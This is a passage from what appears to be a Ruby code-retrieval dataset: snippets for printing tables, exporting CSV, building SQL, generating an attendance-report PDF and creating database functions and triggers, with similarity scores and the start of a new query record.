"def csv_to_stdout(rows, cols: nil)\n CSV($stdout) { csv_write0(_1, rows, cols:) }\n end",
"def print_table(columns, data, print_headings = true)\n\n # Fill base lengths\n columns.each do |col|\n col[:length] = (print_headings ? col[:title].length : 0)\n end\n\n # Compute maximum length of each field\n data.each do |datum|\n\n columns.each do |col|\n if (col[:func] != nil)\n str = col[:func].call(datum).to_s\n else\n str = datum[col[:key]].to_s\n end\n str = str.gsub(/\\e\\[[0-9;]*m/, '') # eliminate \"colors\"\n col[:length] = [ col[:length], str.length ].max\n end\n\n end\n\n # Create the format string\n table_format_row = '|'\n columns.each do |col|\n if (col[:type] == :int)\n table_format_row << sprintf(\" %%%dd |\", col[:length])\n else\n table_format_row << sprintf(\" %%-%ds |\", col[:length])\n end\n end\n table_format_row << \"\\n\"\n\n # Special line: title\n table_format_title = \"\\e[1m\\e[4m\" +\n table_format_row.gsub(/%-?([0-9]+)[a-z]/, '%-\\1s').gsub(/\\|/, ' ') + \"\\e[m\"\n\n # Create the horizontal line\n table_horizontal = '+'\n columns.each do |col|\n table_horizontal << '-' * (col[:length]+2) << '+'\n end\n\n # Print table\n if (print_headings)\n titles = []\n columns.each do |col|\n titles << col[:title]\n end\n #puts table_horizontal\n printf(table_format_title, *titles);\n else\n puts table_horizontal\n end\n\n data.each do |datum|\n cols_ary = []\n columns.each do |col|\n if (col[:func])\n cols_ary << col[:func].call(datum)\n else\n cols_ary << datum[col[:key]]\n end\n end\n printf(table_format_row, *cols_ary)\n #puts table_horizontal\n end\n puts table_horizontal\n\nend",
"def EXCEL_TABLE(objects, *arguments)\n DebugTable.new(objects, arguments, :tsv)\n end",
"def db_query__show_tables__count\n db_query_transform__count db_query__show_tables\n end",
"def table(table, stream)\n return if already_dumped?(table)\n\n new_stream = StringIO.new\n super(table, new_stream)\n string = new_stream.string\n\n if (parent_table = @connection.parent_table(table))\n table(parent_table, stream)\n string = inject_inherits_for_create_table(string, table, parent_table)\n string = remove_parent_table_columns(string, @connection.columns(parent_table))\n\n pindexes = Hash[@connection.indexes(parent_table).map { |index| [index.columns, index] }]\n cindexes = Hash[@connection.indexes(table).map { |index| [index.columns, index] }]\n\n string = remove_parent_table_indexes(string, (pindexes & cindexes).values)\n end\n\n # We've done this table\n dumped_tables << table\n\n stream.write string\n stream\n end",
"def table_csv_string(options = {})\n opt = {\n :klass => nil,\n :header_row => true\n }.merge!(options)\n str = ''\n \n return false if !opt[:klass]\n\n klass_name = opt[:klass].name\n tbl = ActiveSupport::Inflector.tableize(opt[:klass].name.to_s)\n\n cols = []\n sql = ''\n\n if klass_name == \"Person\" \n cols = %w(id last_name first_name middle_name login)\n else\n cols = opt[:klass].columns.map(&:name) \n end\n\n cols_str = cols.join(\", \")\n\n case opt[:klass].name\n when \"Person\"\n sql = \"SELECT #{cols_str} FROM people p INNER JOIN people_projs pp on p.id = pp.person_id WHERE pp.proj_id = #{self.id};\"\n when \"Ref\"\n cols_str = cols.collect{|c| \"r.#{c}\"}.join(\", \") # refs shared across projects, be more explicit for the join table\n sql = \"SELECT #{cols_str} FROM refs r INNER JOIN projs_refs pr on r.id = pr.ref_id WHERE pr.proj_id = #{self.id};\"\n when \"TaxonName\"\n sql = \"SELECT #{cols_str} FROM taxon_names WHERE #{self.sql_for_taxon_names}\"\n when \"Author\"\n sql = \"SELECT #{cols_str} FROM authors a WHERE a.ref_id IN (SELECT r.id FROM refs r INNER JOIN projs_refs pr on r.id = pr.ref_id WHERE pr.proj_id = #{self.id})\"\n when \"ChrState\"\n sql = \"SELECT #{cols_str} FROM chr_states cs WHERE cs.chr_id IN (SELECT chrs.id from chrs WHERE chrs.proj_id = #{self.id})\" \n # when \"Identifier\"\n # sql = \"SELECT #{cols_str} FROM identifiers si WHERE si.specimen_id IN (SELECT specimens.id from specimens WHERE specimens.proj_id = #{self.id})\"\n when \"SpecimenDetermination\"\n sql = \"SELECT #{cols_str} FROM specimen_determinations sd WHERE sd.specimen_id IN (SELECT specimens.id from specimens WHERE specimens.proj_id = #{self.id})\"\n\n else\n sql = \"SELECT #{cols_str} FROM #{tbl}\" \n end\n\n # add the project level restrictions if they exist\n sql << \" WHERE proj_id = #{self.id}\" if opt[:klass].columns.collect{|c| c.name}.include?(\"proj_id\")\n\n # build the str\n str << cols.join(\"\\t\") if opt[:header_row]# the header row\n str << \"\\n\"\n\n ActiveRecord::Base.connection.select_rows(sql).each do |row| \n # not filtering for tab characters here, likely should\n str << row.collect{|c| c == nil ? nil : c.gsub(/\\n|\\r\\n|\\r/, '\\n')}.join(\"\\t\") + \"\\n\"\n end\n str\n end",
"def probe\n name_pad = columns.map { |c| c.name.length }.max + 1\n type_pad = columns.map { |c| c.type.length }.max + 2\n sql_type_pad = columns.map { |c| c.sql_type.length }.max + 1\n\n columns.sort { |a, b| a.name <=> b.name }.map do |column|\n name = column.name\n name = \"* #{name}\" if primary_key_column?(column)\n print yellow(name.to_s.rjust(name_pad))\n print \" \"\n print blue(column.type.to_s.ljust(type_pad, \".\"))\n print magenta(column.sql_type.to_s.ljust(sql_type_pad))\n column.null ? print(red(\"NULL\")) : print(\" \")\n print \" [#{column.default}]\" if column.default\n print \" #{gray column.comment}\" if column.comment\n puts\n end\n nil\n end",
"def table(enum, opts=OPTS)\n t = Table.new(opts)\n enum.each do |row|\n row = yield(row, t) if block_given?\n t << row\n end\n t.to_s\n end",
"def info_sql\n INFO_SQL\n end",
"def mssql_print_reply(info)\n\n\t\tprint_status(\"SQL Query: #{info[:sql]}\")\n\n\t\tif(info[:done] and info[:done][:rows].to_i > 0)\n\t\t\tprint_status(\"Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})\")\n\t\tend\n\n\t\tif(info[:errors] and not info[:errors].empty?)\n\t\t\tinfo[:errors].each do |err|\n\t\t\t\tprint_error(err)\n\t\t\tend\n\t\tend\n\n\t\tif(info[:rows] and not info[:rows].empty?)\n\n\t\t\ttbl = Rex::Ui::Text::Table.new(\n\t\t\t\t'Indent' => 1,\n\t\t\t\t'Header' => \"\",\n\t\t\t\t'Columns' => info[:colnames]\n\t\t\t)\n\n\t\t\tinfo[:rows].each do |row|\n\t\t\t\ttbl << row\n\t\t\tend\n\n\t\t\tprint_line(tbl.to_s)\n\t\tend\n\tend",
"def display_query_sql(users)\n tag.p('SQL:') + tag.code(users.to_sql)\n end",
"def report_table(output, amount = 10, options = {}, &block)\n \n output.title(options[:title])\n \n top_categories = @categories.sort { |a, b| yield(b[1]) <=> yield(a[1]) }.slice(0...amount)\n output.table({:title => 'Category', :width => :rest}, \n {:title => 'Hits', :align => :right, :highlight => (options[:sort] == :hits), :min_width => 4}, \n {:title => 'Cumulative', :align => :right, :highlight => (options[:sort] == :cumulative), :min_width => 10}, \n {:title => 'Average', :align => :right, :highlight => (options[:sort] == :average), :min_width => 8},\n {:title => 'Min', :align => :right, :highlight => (options[:sort] == :min)}, \n {:title => 'Max', :align => :right, :highlight => (options[:sort] == :max)}) do |rows|\n \n top_categories.each do |(cat, info)|\n rows << [cat, info[:hits], \"%0.02fs\" % info[:cumulative], \"%0.02fs\" % (info[:cumulative] / info[:hits]),\n \"%0.02fs\" % info[:min], \"%0.02fs\" % info[:max]]\n end \n end\n\n end",
"def print_sqlite(filename)\n return to_enum(:print_sqlite, filename) unless block_given?\n depends gems: [\"sequel\", \"sqlite3\"]\n\n require 'sequel'\n require 'pp'\n\n Sequel.sqlite(filename) do |db|\n db.tables.each do |table|\n yield print_header(\"#{table}\", 1)\n schemas = db[:sqlite_master].where(tbl_name: \"#{table}\").select(:sql).map(&:values).flatten.join(\"\\n\")\n yield CodeRay.scan(schemas, :sql).term\n yield \"\"\n begin\n db[table].each { |row| yield CodeRay.scan(row.pretty_inspect, :ruby).term }\n rescue Sequel::DatabaseError => e\n yield e.inspect\n end\n yield \"\"\n yield \"\"\n end\n end\nend",
"def print_table\n\t$table.each do |row|\n\t\trow.each_with_index do |c, index|\n\t\t\tif index != 0\n\t\t\t\tprint ' '\n\t\t\tend\n\t\t\tprint c\n\t\tend\n\t\tprint \"\\n\"\n\tend\nend",
"def _exec_select\n result = []\n csv = CSV.parse(File.read(@table_name), headers: true)\n if @join_flag != 1\n _parse_when_not_join(result, csv)\n else\n _parse_when_join(result, csv)\n end\n if @order_flag == 1\n result = _parse_order(result)\n end\n p result\n end",
"def tinhhinh(tenant)\n \tsql = <<-eos \n select row_number() OVER(ORDER BY t.ten, t.ho_dem, t.ho) as \"stt\", t.\"msv\",\nconcat(t.\"ho\" ,' ', t.ho_dem,' ', t.ten) as \"hovaten\", to_char(t.ngay_sinh,'DD/MM/YYYY' ) as \"ngaysinh\",\ncase when t.\"T1\"=0 then NULL else t.\"T1\" end as \"T1\", case when t.\"T2\"=0 then NULL else t.\"T2\" end as \"T2\", \ncase when t.\"T3\"=0 then NULL else t.\"T3\" end as \"T3\", case when t.\"T4\"=0 then NULL else t.\"T4\" end as \"T4\",\ncase when t.\"T5\"=0 then NULL else t.\"T5\" end as \"T5\", case when t.\"T6\"=0 then NULL else t.\"T6\" end as \"T6\", \ncase when t.\"T7\"=0 then NULL else t.\"T7\" end as \"T7\", case when t.\"T8\"=0 then NULL else t.\"T8\" end as \"T8\", \ncase when t.\"T9\"=0 then NULL else t.\"T9\" end as \"T9\", case when t.\"T10\"=0 then NULL else t.\"T10\" end as \"T10\", \ncase when t.\"T11\"=0 then NULL else t.\"T11\" end as \"T11\", case when t.\"T12\"=0 then NULL else t.\"T12\" end as \"T12\",\ncase when t.\"T13\"=0 then NULL else t.\"T13\" end as \"T13\", case when t.\"T14\"=0 then NULL else t.\"T14\" end as \"T14\",\ncase when t.\"T15\"=0 then NULL else t.\"T15\" end as \"T15\", case when t.\"T16\"=0 then NULL else t.\"T16\" end as \"T16\",\nCOALESCE(\"T1\",0) + COALESCE(\"T2\",0)+ COALESCE(\"T3\",0)+ COALESCE(\"T4\",0)\n + COALESCE(\"T5\",0)+ COALESCE(\"T6\",0)+ COALESCE(\"T7\",0)+ COALESCE(\"T8\",0)+ COALESCE(\"T9\",0)+ COALESCE(\"T10\",0)\n + COALESCE(\"T11\",0)+ COALESCE(\"T12\",0)+ COALESCE(\"T13\",0)+ COALESCE(\"T14\",0)+ COALESCE(\"T15\",0)\n + COALESCE(\"T16\",0) as tonggiovang, t.diemchuyencan, t.diemthuchanh,\n t.lan1 as lan1, t.lan2 as lan2, t.lan3 as lan3, round(t.diemgoctbkt, 2) as diemgoctbkt, t.diemtbkt, case when t.diemchuyencan=0 then 0 else t.diemquatrinh end as diemquatrinh,\n t.note as note\n from \n(SELECT \"msv\", sv1.ho, sv1.ho_dem, sv1.ten, sv1.ngay_sinh , \"T1\", \"T2\", \"T3\", \"T4\", \"T5\", \"T6\", \"T7\", \"T8\", \"T9\", \"T10\", \"T11\",\n \"T12\", \"T13\", \"T14\", \"T15\", \"T16\", COALESCE(\"T1\",0) + COALESCE(\"T2\",0)+ COALESCE(\"T3\",0)+ COALESCE(\"T4\",0)\n + COALESCE(\"T5\",0)+ COALESCE(\"T6\",0)+ COALESCE(\"T7\",0)+ COALESCE(\"T8\",0)+ COALESCE(\"T9\",0)+ COALESCE(\"T10\",0)\n + COALESCE(\"T11\",0)+ COALESCE(\"T12\",0)+ COALESCE(\"T13\",0)+ COALESCE(\"T14\",0)+ COALESCE(\"T15\",0)\n + COALESCE(\"T16\",0) as tonggiovang, sv1.diem_chuyen_can as diemchuyencan, sv1.diem_thuc_hanh as diemthuchanh,\n sv1.lan1 as lan1, sv1.lan2 as lan2, sv1.lan3 as lan3, sv1.diem_goc_tbkt as diemgoctbkt, sv1.diem_tbkt as diemtbkt, sv1.diem_qua_trinh as diemquatrinh,\n sv1.note as note\n FROM crosstab(\n 'select dd.ma_sinh_vien, l.tuan, sum(CASE WHEN phep THEN 0 ELSE so_tiet_vang END ) as so_vang\n from t1.diem_danhs dd\n inner join t1.lich_trinh_giang_days l on l.id = dd.lich_trinh_giang_day_id\n where l.lop_mon_hoc_id = #{object.id}\n and dd.so_tiet_vang > 0\n group by ma_sinh_vien, tuan\n order by 1,2',\n 'select m from generate_series(1,16) m')\n AS (\"msv\" text, \"T1\" int, \"T2\" int, \"T3\" int, \"T4\" int, \"T5\" int, \"T6\" int, \"T7\" int, \"T8\" int, \"T9\" int, \"T10\" int\n , \"T11\" int, \"T12\" int, \"T13\" int, \"T14\" int, \"T15\" int, \"T16\" int)\n inner join t1.lop_mon_hoc_sinh_viens sv1 on sv1.ma_sinh_vien = msv and sv1.lop_mon_hoc_id = #{object.id}\n\n union all\n select ma_sinh_vien as \"msv\", ho, ho_dem, ten, ngay_sinh, 0 as \"T1\", 0 as \"T2\", \n 0 as \"T3\", 0 as \"T4\", 0 as \"T5\", 0 as \"T6\", \n0 as \"T7\", 0 as \"T8\", 0 as \"T9\", 0 as \"T10\", 0 as \"T11\", 0 as \"T12\", \n0 as \"T13\", 0 as \"T14\", 0 as \"T15\", 0 as \"T16\", 0 as tongiovang , diem_chuyen_can , diem_thuc_hanh as diemthuchanh,\nlan1, lan2, lan3, diem_goc_tbkt as diemgoctbkt, diem_tbkt as diemtbkt, diem_qua_trinh as diemquatrinh, note as note\nfrom t1.lop_mon_hoc_sinh_viens where (status is NULL or status != true) and lop_mon_hoc_id=#{object.id} and ma_sinh_vien not in (select dd.ma_sinh_vien\n from t1.diem_danhs dd\n inner join t1.lich_trinh_giang_days l on l.id = dd.lich_trinh_giang_day_id\n where l.lop_mon_hoc_id = #{object.id}\n and dd.so_tiet_vang > 0)\n ) as t\n order by t.ten, t.ho_dem, t.ho, t.ngay_sinh\n eos\n @res = ActiveRecord::Base.connection.execute(sql) \n \n pdf = Prawn::Document.new(:page_layout => :landscape, \n :page_size => 'A4', :margin => 20)\n #pdf.font \"#{Rails.root}/app/assets/fonts/arial.ttf\"\n pdf.font_families.update(\n 'Arial' => { :normal => Rails.root.join('app/assets/fonts/arial2.ttf').to_s,\n :bold => Rails.root.join('app/assets/fonts/arialbd.ttf').to_s,\n :italic => Rails.root.join('app/assets/fonts/arialbi.ttf').to_s} \n )\n \n cell_width = 40\n row_height = 120\n img_path = \"#{Rails.root}/public/images/logo.png\"\n pieces = [[img_path, \"\"]]\n pieces.each do |p|\n #pdf.move_down 5 # a bit of padding\n cursor = pdf.cursor \n p.each_with_index do |v,j|\n pdf.bounding_box [cell_width*j, cursor], :height => 80, :width => ( j == 0 ? cell_width : 780) do\n if j == 0\n pdf.image v, :width => 40\n else \n pdf.font \"Arial\"\n t1 = pdf.make_table [[\"BỘ GIÁO DỤC VÀ ĐÀO TẠO\"],[\"TRƯỜNG ĐẠI HỌC DÂN LẬP HẢI PHÒNG\"],[\"\"],[\"\"]], :width => 260, :cell_style => {:align => :center, :valign => :center, :size => 10, :height => 20, :borders => []}\n t2 = pdf.make_table [[\" BẢNG THEO DÕI TÌNH HÌNH MÔN HỌC\"]], :width => 480, :cell_style => {:valign => :center, :size => 10, :font_style => :bold, :height => 20, :borders => []} do \n row(0).columns(0).padding_left = 40\n end\n t3 = pdf.make_table [\n [\"Môn học: #{object.ten_mon_hoc}\",\"\", \"Tổng số tiết:.....\"],\n [\"Giáo viên phụ trách: #{object.ten_giang_vien}\",\"\", \"Lý thuyết:.....\"],\n [\"Lớp: #{object.ma_lop} Kỳ: #{tenant.hoc_ky} Năm học: #{tenant.nam_hoc}\",\"\", \"Thực hành, thí nghiệm:.....\"]\n ], :cell_style => {:size => 9, :height => 20, :borders => []}, :width => 480, :column_widths => { 0 => 210, 1 => 100, 2 => 170} do \n row(0).columns(0).font_style = :bold\n end \n\n t4 = pdf.make_table [[t2], [t3]], :cell_style => {:borders => []}\n t0 = pdf.make_table [[\"\"]], :width => 20, :cell_style => {:borders => []}\n pdf.table [ \n [ \n t0,\n t1,\n t0, \n t4 \n ]\n ] , :cell_style => {:borders => []}\n end\n end\n end\n end\n pdf.move_down(5)\n @res = @res.to_a\n m = @res.each_slice(19).to_a if @res.count <= 19\n if @res.count > 19\n m1 = @res[0..18]\n m2 = @res[19..-1].each_slice(23).to_a\n m = m2.unshift(m1)\n end\n page_count = m.count\n m.each_with_index do |m1, index|\n pdf.font \"Arial\" \n items1 = m1.map {|i| [i[\"stt\"], i[\"msv\"], i[\"hovaten\"], i[\"ngaysinh\"]]} \n mtable01 = pdf.make_table [[\"Stt\", \"Mã SV\", \"Họ và tên\", \"Ngày sinh\"]], :width => 240, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 50}, :column_widths => {1 => 52, 2 => 115, 3 => 50}\n mtable02 = pdf.make_table items1, :width => 240, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 20}, :column_widths => {1 => 52, 2 => 115, 3 => 50} do \n (0..items1.length).each do |l|\n row(l).columns(2).align = :left\n end\n end\n\n items2 = m1.map {|item| \n [item[\"T1\"],item[\"T2\"],item[\"T3\"],item[\"T4\"],item[\"T5\"],item[\"T6\"],item[\"T7\"],item[\"T8\"],item[\"T9\"],item[\"T10\"],item[\"T11\"],item[\"T12\"],item[\"T13\"],item[\"T14\"],item[\"T15\"],item[\"T16\"],\n item[\"tonggiovang\"], item[\"diemchuyencan\"]]}\n items3 = @res.map {|item| [item[\"lan1\"], item[\"lan2\"], item[\"lan3\"], item[\"diemtbkt\"]]} \n mytable0 = pdf.make_table [[\"Điểm danh\"]], :width => 370, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 20, :font_style => :bold}\n mytable01 = pdf.make_table [[\"T1\",\"T2\",\"T3\",\"T4\",\"T5\",\"T6\",\"T7\",\"T8\",\"T9\",\"T10\",\"T11\",\"T12\",\"T13\",\"T14\",\"T15\",\"T16\",\"Tổng giờ vắng\", \"Điểm chuyên cần\"]] + items2, :width => 370, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20}, :header => true do \n (0..items2.length).each do |l| \n row(l).columns(16).width = 25\n row(l).columns(17).width = 25\n end\n row(0).columns(16).size = 5\n row(0).columns(17).size = 5 \n (0..17).each do |t|\n row(0).columns(t).height = 30 \n end\n\n end\n\n items3 = m1.map {|i| [i[\"diemthuchanh\"]]} \n mtable11 = pdf.make_table [[\"Điểm TH, TN, BTL, ĐA\"]] + items3, :width => 22, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20} do \n row(0).columns(0).height = 50\n row(0).columns(0).size = 5 \n end\n\n items4 = m1.map {|i| [i[\"lan1\"], i[\"lan2\"], i[\"lan3\"], i[\"diemgoctbkt\"], i[\"diemtbkt\"]]}\n mtable2 = pdf.make_table [[\"Điểm kiểm tra thường xuyên\"]], :width => 110, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 20}\n mtable21 = pdf.make_table [[\"Lần 1\", \"Lần 2\", \"Lần 3\", \"TB Kiểm tra\", \"Quy điểm QT\"]] + items4, :width => 110, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20} do \n (0..4).each do |i|\n row(0).columns(i).size = 5\n row(0).columns(i).height = 30\n end\n end\n \n items5 = m1.map {|i| [i[\"diemquatrinh\"], i[\"note\"]]} \n mtable31 = pdf.make_table [[\"Tổng điểm QT\", \"Ghi chú\"]] + items5, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20}, :column_widths => {0 => 20, 1 => 39} do \n (0..1).each do |i|\n row(0).columns(i).height = 50\n row(0).columns(i).size = 5 \n end \n row(0).columns(1).size = 7.5\n end\n \n #mytable1 = pdf.make_table [[mytable0],[mytable01]]\n\n #mtable0 = pdf.make_table [[\"Điểm kiểm tra thường xuyên\"]], :width => 80, :cell_style => {:align => :center, :size => 7}\n #mtable01 = pdf.make_table [[\"Lần 1\", \"Lần 2\", \"Lần 3\", \"TB Kiểm tra\"]] + items3, :width => 80, :cell_style => {:align => :center, :size => 7}\n pdf.table [ \n [\n [\n [mtable01],[mtable02]\n ], \n [\n [mytable0],[mytable01]\n ],\n [\n [mtable11]\n ],\n [\n [mtable2],[mtable21]\n ],\n [\n [mtable31]\n ]\n ]\n ] \n #pdf.start_new_page(:margin => 20) unless index == page_count\n end\n pdf.move_down 2\n d = DateTime.now\n \n #pdf.text \"Duyệt #{object.sosvtucach} sinh viên được dự thi kết thúc học phần\", :style => :italic, :size => 8\n pdf.table [[\"Duyệt #{object.sosvtucach} sinh viên được dự thi kết thúc học phần\",\"\",\"\"],[\"\",\"\", \"Hải phòng, ngày #{d.day} tháng #{d.month} năm #{d.year}\"]], :cell_style => {:font_style => :italic, :size => 8, :borders => []}, :column_widths => {0 => 270, 1 => 270, 2 => 260} do \n row(1).columns(2).padding_left = 20\n end\n pdf.move_down 2\n str = \"Ghi chú:\\n- Khi SV vắng đề nghị Thầy, Cô ghi cụ thể số tiết vắng.\\nVí dụ V: có nghĩa SV vắng 3 tiết\\n-Trước khi thi 7 ngày, giáo viên dạy môn học nộp bảng theo dõi cho Chủ nhiệm Bộm môn để duyệt tư cách dự thi cho sinh viên.\"\n pdf.table [[str, \"CHỦ NHIỆM BỘ MÔN\",\"GIÁO VIÊN PHỤ TRÁCH MÔN HỌC\"]], :cell_style => {:borders => []}, :column_widths => {0 => 270, 1=> 270, 2 => 260} do \n row(0).columns(0).font_style = :italic\n row(0).columns(0).size = 8\n row(0).columns(1).font_style = :bold\n row(0).columns(1).size = 12\n row(0).columns(2).font_style = :bold\n row(0).columns(2).size = 12\n row(0).columns(1).padding_left = 50\n #row(0).columns(2).padding_left = 0\n end\n pdf.repeat(:all) do \n pdf.draw_text \"QC07-B10\", :at => [10, -10]\n #pdf.stamp \"approved\" \n end\n #items.unshift [\"Stt\",\"Mã SV\",\"Họ và tên\",\"Ngày sinh\",mytable1, \"Điểm TH, TN, BTL, ĐA\", mtable1, \"Tổng điểm QT\", \"Ghi chú\"]\n \n \n return pdf\n \n end",
"def csv_export_rawtable(table_name, data_array, options = {})\n column_definitions = []\n eval(\"#{table_name}.content_columns\").each do |column|\n column_definitions << [column.name, column.name]\n end\n csv_export(column_definitions, data_array, options)\n end",
"def perform_query\n Rails.logger.info queries.to_sql\n queries\n end",
"def format_output_without_CSV\r\n\t\theadings = [] << \"Run\"\r\n\t\trows = []\r\n\t\t@parameters.each_with_index {|p,i| headings << \"F#{i+1}\"}\r\n\t\t@runs.each_with_index {|r,i| temp = [\"#{i+1}\"]; temp += r; rows << temp}\r\n\t\t@output_table = Terminal::Table.new :title => \"IPO Algorithm tests output\", :headings => headings, :rows => rows\r\n\tend",
"def table(opts = { print: true })\n require \"inspec/ui_table_helper\"\n\n the_table = TableHelper.new\n yield(the_table)\n\n colorizer = proc do |data, row, _col|\n if color? && row == 0\n ANSI_CODES[:bold] + ANSI_CODES[:color][:white] + data.to_s + ANSI_CODES[:reset]\n else\n data\n end\n end\n render_mode = color? ? :unicode : :ascii\n padding = [0, 1, 0, 1] # T R B L\n result = the_table.render(render_mode, filter: colorizer, padding: padding) + \"\\n\"\n print_or_return(result, opts[:print])\n end"
] |
[
"0.66475284",
"0.6606472",
"0.65019464",
"0.63997036",
"0.6392478",
"0.63616675",
"0.62400645",
"0.62208533",
"0.61771643",
"0.61625415",
"0.6158442",
"0.6136209",
"0.6056827",
"0.6039973",
"0.6032121",
"0.58631384",
"0.58205557",
"0.5808749",
"0.5798774",
"0.5790676",
"0.5790676",
"0.5790676",
"0.5790676",
"0.5775653",
"0.5745019",
"0.5735132",
"0.5695256",
"0.5684484",
"0.56601346",
"0.5659827",
"0.5654196",
"0.56307334",
"0.5623389",
"0.5592575",
"0.55723566",
"0.55706954",
"0.55627024",
"0.55618626",
"0.55503356",
"0.5533816",
"0.553336",
"0.5509686",
"0.54812",
"0.5471983",
"0.5457653",
"0.5451937",
"0.54334354",
"0.542543",
"0.5423814",
"0.5416426",
"0.5403393",
"0.53946525",
"0.5388767",
"0.5378842",
"0.5374175",
"0.5369464",
"0.53646994",
"0.53566927",
"0.53474736",
"0.5342925",
"0.53275424",
"0.5322068",
"0.53195715",
"0.5314724",
"0.53140205",
"0.5307953",
"0.5300674",
"0.5299183",
"0.5299183",
"0.5299183",
"0.5287995",
"0.5281602",
"0.5276677",
"0.52743137",
"0.5269856",
"0.5264236",
"0.52633405",
"0.5262323",
"0.5255205",
"0.5238439",
"0.5232062",
"0.5227304",
"0.522695",
"0.52246934",
"0.52235967",
"0.5222492",
"0.52116615",
"0.5208052",
"0.52064264",
"0.5206319",
"0.52038133",
"0.52015644",
"0.51974297",
"0.51856387",
"0.5185005",
"0.5182303",
"0.51772857",
"0.51739097",
"0.5171716",
"0.5167382"
] |
0.5837525
|
16
|
SQL statement to create database function.
|
def create_function_sql(name, definition, opts=OPTS)
args = opts[:args]
if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}
returns = opts[:returns] || 'void'
end
language = opts[:language] || 'SQL'
<<-END
CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}
#{"RETURNS #{returns}" if returns}
LANGUAGE #{language}
#{opts[:behavior].to_s.upcase if opts[:behavior]}
#{'STRICT' if opts[:strict]}
#{'SECURITY DEFINER' if opts[:security_definer]}
#{"PARALLEL #{opts[:parallel].to_s.upcase}" if opts[:parallel]}
#{"COST #{opts[:cost]}" if opts[:cost]}
#{"ROWS #{opts[:rows]}" if opts[:rows]}
#{opts[:set].map{|k,v| " SET #{k} = #{v}"}.join("\n") if opts[:set]}
AS #{literal(definition.to_s)}#{", #{literal(opts[:link_symbol].to_s)}" if opts[:link_symbol]}
END
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def name\n\t\t\"db_fun\"\n\tend",
"def create_function(name, definition, opts=OPTS)\n self << create_function_sql(name, definition, opts)\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def function_sql(f)\n args = f.args\n \"#{f.f}#{args.empty? ? '()' : literal(args)}\"\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def to_create_database_sql(db)\n db.send(:create_database_sql, self.name, {})\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
